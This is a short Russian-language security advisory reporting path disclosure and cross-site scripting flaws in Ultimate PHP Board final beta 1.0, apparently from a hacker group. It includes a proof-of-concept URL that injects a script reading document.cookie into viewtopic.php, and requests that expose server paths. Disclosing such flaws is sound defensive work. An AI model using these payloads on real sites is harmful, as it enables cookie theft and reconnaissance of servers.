Ultimate PHP Board — небольшой форум, написанный на PHP. 

Непроверка данных, передаваемых переменной id в сценарии viewtopic.php, приводит к возможности увидеть полный путь к форуму от корня + дает возможность вставки произвольного html кода. Сценарий add.php также позволяет получить информацию о физическом расположении сценариев на сервере. Пример: 

1. Запрос сценария add.php выдаст следующую ошибку: 

Warning: Failed opening ‘textdb_v2.inc.php’ for inclusion (include_path=’.:/usr/local/lib/php’) in
/home/samcom/public_html/public/messageboard2/add.php on line 5 attempting to edit record… 

Fatal error: Call to undefined function: format_field() in /home/samcom/public_html/public/messageboard2/add.php on line 11 

2. Следующий запрос позволяет вставить произвольный HTML код в сценарий viewtopic.php: 

http://hostname.com/phorum/viewtopic.php?id= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2 

3. Раскрытие пути в viewtopic.php: 

http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2 
================

cos the `id’ parameter doesnt check if input data has entered 
correctly, then it output folloving error message: 

================
Warning: Unable to access ./data_dir/some_shit.dat in /home/samcom/public_html/public/messageboard2/textdb.inc.php on
line 240 

Уязвимость обнаружена в Ultimate PHP Board (UPB) final beta 1.0.
Уязвимость обнаружил euronymous из HACKRU Team (f0kp.iplus.ru).



Оставить мнение